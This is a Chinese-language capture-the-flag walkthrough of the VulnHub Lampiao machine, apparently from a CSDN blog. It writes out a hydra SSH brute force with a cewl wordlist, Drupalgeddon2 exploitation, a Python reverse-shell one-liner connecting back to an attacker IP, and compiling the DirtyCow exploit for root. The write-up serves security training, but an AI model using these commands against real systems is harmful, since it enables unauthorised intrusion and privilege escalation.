2-Lampiao dirtycow提权

靶机地址 https://www.vulnhub.com/entry/lampiao-1,249/
在这里插入图片描述

1.信息收集

主机ip

nmap 192.168.75.0/24

在这里插入图片描述

主机端口

nmap 192.168.75.137 -p- -T5 -sS -A -sV

在这里插入图片描述

2.信息探测

2.1端口访问

80端口

在这里插入图片描述

1898端口

home 联想到 kali 里面有个文件夹为 home 用户文件夹

有登录可能需要爆破此页面应该有登录信息

Node 2 is not working 猜测为子网页

下面有 Drupal 为一个开源web管理系统

点击read more 进行探测

在这里插入图片描述

发现url 发生改变

在这里插入图片描述

访问 node/2

发现有 m4a png

在这里插入图片描述

访问获取信息

audio.m4a 得到 user tiago

扫描二维码 Try harder! muahuahua 密码需要爆破

在这里插入图片描述

访问 node/3 得到mp3 尝试听过没得到信息

在这里插入图片描述

2.2查看目录文件

robots.txt

robots.txt 有的有有的无

在这里插入图片描述

查看robots.txt 信息太多慢慢查看发现changelog.txt

访问发现是系统修改日志 Drupal 与前面照应

在这里插入图片描述

dirb

dirb 使用教程 https://zhuanlan.zhihu.com/p/26549845  https://www.jianshu.com/p/9616a4dcb1b0
官方说明 https://www.kali.org/tools/dirb/
dirb http://192.168.75.137:1898

在这里插入图片描述

dirsearch

direach 是也是一个扫描工具  教程https://blog.csdn.net/Amdy_amdy/article/details/109522882

在这里插入图片描述

2.3爆破密码

cewl kali 字典工具 https://zhuanlan.zhihu.com/p/159660224  https://www.kali.org/tools/cewl/
cewl http://192.168.75.137 -w password.txt

hydra
hydra -l tiago -P password.txt 192.168.75.137 ssh
先利用cewl来生成一份结合网站目标的社工性质的密码字典 再用hydra爆破

得到密码Virgulino 登录ssh

在这里插入图片描述

3.提权

Durpal

搜索 Drupal 7.54 exploit     https://www.exploit-db.com/exploits/44449
得到漏洞 CVE-2018-7600 
使用msf 利用漏洞框架

在这里插入图片描述

配置exp选项 进行利用
shell
python -c 'import pty; pty.spawn("/bin/bash")' 获得有框架的shell

在这里插入图片描述

dirtycow

搜索 kali exploit suggester 
得到 https://github.com/mzet-/linux-exploit-suggester

在这里插入图片描述

在本地开启监听窗口 反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.75.129",6688));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
使用les.sh 
chmod +x les.sh  赋权
./les.sh

在这里插入图片描述

在主机搜索 dirty  exploit
searchexploit dirty 下载40847.cpp 

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
-Wall 一般使用该选项，允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别，-O0表示没有优化,-O1为缺省值，-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时，需要链接pthread库
-o dcow gcc生成的目标文件,名字为dcow
执行gcc编译可执行文件，可直接提权。
./40847
得到修改后的ssh root密码
进行登录 查看flag

在这里插入图片描述

Xray

xray 下载 https://github.com/chaitin/xray/releases
xray 部署 https://blog.csdn.net/qq_41901122/article/details/115307604

通过AWVS+xray跑出了poc：
https://github.com/dreadlocked/Drupalgeddon2
https://paper.seebug.org/567/

通过文章查看，Drupalgeddon2有poc都是rb运行文件，下载：
https://github.com/dreadlocked/Drupalgeddon2
proxychains git clone https://github.com/dreadlocked/Drupalgeddon2.git
这里需要配置代理 需要梯子 没有梯子的话 建议在网上下载后拉到kali里面

sudo gem install highline  //这里我用过了 就不再重复了
./drupalgeddon2.rb http://192.168.75.138:1898/

在这里插入图片描述

然后就是反弹shell 跟前面dirtycow一样

总结

本次学到了 les.sh 脚本跑本系统的漏洞
和xray poc 渗透永不止

本文连接

https://blog.csdn.net/WHHLS/article/details/123495022

原文链接：https://blog.csdn.net/WHHLS/article/details/123495022